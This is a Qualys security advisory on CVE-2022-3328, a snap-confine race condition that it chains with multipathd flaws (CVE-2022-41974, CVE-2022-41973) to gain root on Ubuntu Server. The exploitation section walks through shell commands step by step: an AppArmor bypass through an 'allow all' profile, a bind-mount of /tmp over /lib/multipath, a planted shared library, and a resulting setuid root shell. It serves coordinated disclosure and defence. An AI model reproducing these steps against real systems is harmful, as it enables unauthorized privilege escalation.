Qualys Security Advisory

Race condition in snap-confine's must_mkdir_and_open_with_perms()
(CVE-2022-3328)


========================================================================
Contents
========================================================================

Summary
Background
Exploitation
Acknowledgments
Timeline

    I can't help but feel a missed opportunity to integrate lyrics from
    one of the best songs ever: [SNAP! - The Power (Official Video)]
        -- https://twitter.com/spendergrsec/status/1494420041076461570


========================================================================
Summary
========================================================================

We discovered a race condition (CVE-2022-3328) in snap-confine, a
SUID-root program installed by default on Ubuntu. In this advisory, we
tell the story of this vulnerability (which was introduced in February
2022 by the patch for CVE-2021-44731) and detail how we exploited it in
Ubuntu Server (a local privilege escalation, from any user to root) by
combining it with two vulnerabilities in multipathd (an authorization
bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):

https://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt


========================================================================
Background
========================================================================

    Like the crack of the whip, I Snap! attack
    Radical mind, day and night all the time
        -- SNAP! - The Power

In February 2022, we published CVE-2021-44731 in our "Lemmings" advisory
(https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt):
to set up a snap's sandbox, snap-confine created the temporary directory
/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did
not belong to root; a local attacker could race against snap-confine,
retain control over /tmp/snap.$SNAP_NAME, and eventually obtain full
root privileges.

This vulnerability was patched by commit acb2b4c ("cmd/snap-confine:
Prevent user-controlled race in setup_private_mount"), which introduced
a new helper function, must_mkdir_and_open_with_perms():

------------------------------------------------------------------------
142 static void setup_private_mount(const char *snap_name)
...
169         sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);
...
176         base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);
------------------------------------------------------------------------
 55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid,
 56                                           mode_t mode)
 ..
 61  mkdir:
 ..
 67         if (mkdir(dir, 0700) < 0 && errno != EEXIST) {
 ..
 70         fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
 ..
 81         if (fstat(fd, &st) < 0) {
 ..
 84         if (st.st_uid != uid || st.st_gid != gid
 85             || st.st_mode != (S_IFDIR | mode)) {
...
130                 if (rename(dir, random_dir) < 0) {
...
135                 goto mkdir;
------------------------------------------------------------------------

- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if
  it does not exist already;

- if it already exists, and if it does not belong to root (at line 84),
  then it is moved out of the way (at line 130) by rename()ing it to a
  random directory in /tmp, and its creation is retried (at line 135).

When we reviewed this patch back in December 2021, we felt very nervous
about this rename() call (because it allows a local attacker to rename()
a directory they do not own), and we advised the Ubuntu Security Team to
either not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create
it in a non-world-writable directory instead of /tmp, or at least to use
renameat2(RENAME_EXCHANGE) instead of rename().

Unfortunately, all of these ideas were deemed impractical (for example,
renameat2() is not supported by older kernel and glibc versions);
moreover, we (Qualys) failed to come up with a feasible attack plan
against this rename() call, so the patch was kept in its current form.

After the release of Ubuntu 22.04 in April 2022, we decided to revisit
snap-confine and its recent hardening changes, and we finally found a
way to exploit the rename() call in must_mkdir_and_open_with_perms().


========================================================================
Exploitation
========================================================================

    It's getting, it's getting, it's getting kinda heavy
    It's getting, it's getting, it's getting kinda hectic
        -- SNAP! - The Power

The three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:

1/ snap-confine operates in /tmp to create a snap's temporary directory
(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in
/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in
sc_bootstrap_mount_namespace(), where all of the Xs are randomized by
mkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap
instance name by sc_instance_name_validate() (when all of the Xs are
lowercase alphanumeric):

------------------------------------------------------------------------
286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)
...
288         char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";
...
291         if (mkdtemp(scratch_dir) == NULL) {
...
303         sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);
...
319         sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,
...
331         for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;
...
342                 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir,
343                                  mnt->path);
...
352                 sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,
------------------------------------------------------------------------

2/ We therefore execute two instances of snap-confine in parallel:

- we block the first snap-confine immediately after it creates its root
  directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this
  race condition by "single-stepping" snap-confine, as explained in our
  "Lemmings" advisory);

- we execute the second snap-confine with a snap instance name of
  rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of
  this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX
  of the first snap-confine;

- we kill this second snap-confine immediately after it rename()s its
  temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory
  /tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we
  reliably win this race condition with inotify, as explained in our
  "Lemmings" advisory);

- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and
  resume the execution of the first snap-confine, whose root directory
  now belongs to us.

3/ We can therefore create an arbitrary symlink
/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will
bind-mount the real /tmp directory (which is world-writable) onto any
directory in the filesystem (because mount() will follow our arbitrary
symlink at line 352).

This ability will eventually allow us to obtain full root privileges,
but we must first solve three problems:

------------------------------------------------------------------------

Problem a/ We cannot trick snap-confine into rename()ing
/tmp/snap.rootfs_XXXXXX, because this directory belongs to root and
must_mkdir_and_open_with_perms() rename()s it only if it does not belong
to root!

This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX
belongs to the user root, but it belongs to the group of our own user,
so must_mkdir_and_open_with_perms() rename()s it because it does not
belong to the group root (at line 84).

------------------------------------------------------------------------

Problem b/ We cannot trick snap-confine into following our symlink
/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()
bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line
319): if we create our symlink before this bind-mount, then it becomes
covered by the squashfs; and we cannot create our symlink after this
bind-mount, because the squashfs is read-only and belongs to root!

The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount"
of our "Lemmings" advisory suggests a solution to this problem: we must
unmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()
bind-mounts it (at lines 303 and 319).

The "(deleted)" technique we used in "Lemmings" (CVE-2021-3996 in
util-linux) was patched in January 2022, but we found a surprisingly
simple workaround: we mount a FUSE filesystem onto
/tmp/snap.rootfs_XXXXXX, immediately after we re-create this directory
ourselves; this allows us to unmount (with fusermount -u -z) any
subsequent bind-mounts (even if they belong to root), because fusermount
does not check that our FUSE filesystem is indeed the most recently
mounted filesystem on /tmp/snap.rootfs_XXXXXX.

------------------------------------------------------------------------

Problem c/ We cannot trick snap-confine into bind-mounting the real /tmp
onto an arbitrary directory in the filesystem (at line 352), because
such a bind-mount is forbidden by snap-confine's AppArmor profile!

To solve this problem, we must bypass AppArmor completely, but the
technique we used in our "Lemmings" advisory (we wrapped snap-confine's
execution in an AppArmor profile that was in "complain" mode, not in
"enforce" mode) was patched in February 2022 (by commits 26eed65 and
4a2eb78, "ensure that snap-confine is in strict confinement" and
"Tighten AppArmor label check"): now, snap-confine's execution must be
wrapped in an AppArmor profile that is in "enforce" mode and whose label
matches the regular expression
"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$".

We were about to give up on trying to exploit snap-confine, when we
discovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is
installed by default on Ubuntu Server): these two vulnerabilities allow
us to create a directory named "failed_wwids" (user root, group root,
mode 0700) anywhere in the filesystem, and we were able to transform
this very limited directory creation into a complete AppArmor bypass.

AppArmor supports policy namespaces that are loosely related to kernel
user namespaces; by default, no AppArmor namespaces exist:

------------------------------------------------------------------------
$ ls -la /sys/kernel/security/apparmor/policy/namespaces
total 0
drwxr-xr-x 2 root root 0 Aug  6 12:42 .
drwxr-xr-x 5 root root 0 Aug  6 12:42 ..
------------------------------------------------------------------------

However, we (attackers) can create an AppArmor namespace "failed_wwids"
by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:

------------------------------------------------------------------------
$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath

$ multipathd list devices | grep 'whitelisted, unmonitored'
    sda1 devnode whitelisted, unmonitored
...

$ multipathd list list path sda1 fail

$ ls -la /sys/kernel/security/apparmor/policy/namespaces
total 0
drwxr-xr-x 3 root root 0 Aug  6 12:42 .
drwxr-xr-x 5 root root 0 Aug  6 12:42 ..
drwx------ 5 root root 0 Aug  6 13:38 failed_wwids
------------------------------------------------------------------------

Then, we can enter this AppArmor namespace by creating and entering an
unprivileged user namespace:

------------------------------------------------------------------------
$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh
------------------------------------------------------------------------

Inside this namespace, we can create an AppArmor profile labeled
"/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows all
possible operations:

------------------------------------------------------------------------
# apparmor_parser -K -a << "EOF"
/usr/lib/snapd/snap-confine (enforce) {
capability,
network,
mount,
remount,
umount,
pivot_root,
ptrace,
signal,
dbus,
unix,
file,
change_profile,
}
EOF
------------------------------------------------------------------------

Back in the initial namespace, we check that our "allow all" AppArmor
profile still exists:

------------------------------------------------------------------------
# aa-status
apparmor module is loaded.
32 profiles are loaded.
32 profiles are in enforce mode.
...
   :failed_wwids:/usr/lib/snapd/snap-confine
------------------------------------------------------------------------

Last, we make sure that snap-confine accepts our "allow all" AppArmor
profile (i.e., AppArmor is bypassed, and snap-confine is effectively
unconfined):

------------------------------------------------------------------------
$ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent
...
DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine
DEBUG: apparmor mode is: enforce
------------------------------------------------------------------------

We can therefore bind-mount /tmp onto an arbitrary directory in the
filesystem (by exploiting CVE-2022-3328); since we already depend on
multipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,
create our own shared library /lib/multipath/libchecktur.so, shut down
multipathd (by exploiting CVE-2022-41974), restart multipathd (through
its Unix socket), and finally obtain full root privileges (because
multipathd executes our shared library as root when it restarts):

------------------------------------------------------------------------
$ grep multipath /proc/self/mountinfo | wc
      0       0       0

$ gcc -o CVE-2022-3328 CVE-2022-3328.c
$ ./CVE-2022-3328
scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c

$ grep multipath /proc/self/mountinfo
1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
...

$ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c

$ ps -ef | grep 'multipath[d]'
root         371       1  0 12:42 ?        00:00:00 /sbin/multipathd -d -s

$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit
ok

$ ps -ef | grep 'multipath[d]' | wc
      0       0       0

$ ls -l /tmp/sh
ls: cannot access '/tmp/sh': No such file or directory

$ multipathd list daemon
error -104 receiving packet

$ ls -l /tmp/sh
-rwsr-xr-x 1 root root 125688 Aug  6 14:55 /tmp/sh

$ /tmp/sh -p
# id
uid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)
                                     ^^^^^^^^^^^^
------------------------------------------------------------------------


========================================================================
Acknowledgments
========================================================================

We thank the Ubuntu security team (Alex Murray and Seth Arnold in
particular) and the snapd team for their hard work on this snap-confine
vulnerability. We also thank the members of linux-distros@openwall.


========================================================================
Timeline
========================================================================

2022-08-23: Contacted security@ubuntu.

2022-11-28: Contacted linux-distros@openwall.

2022-11-30: Coordinated Release Date (17:00 UTC).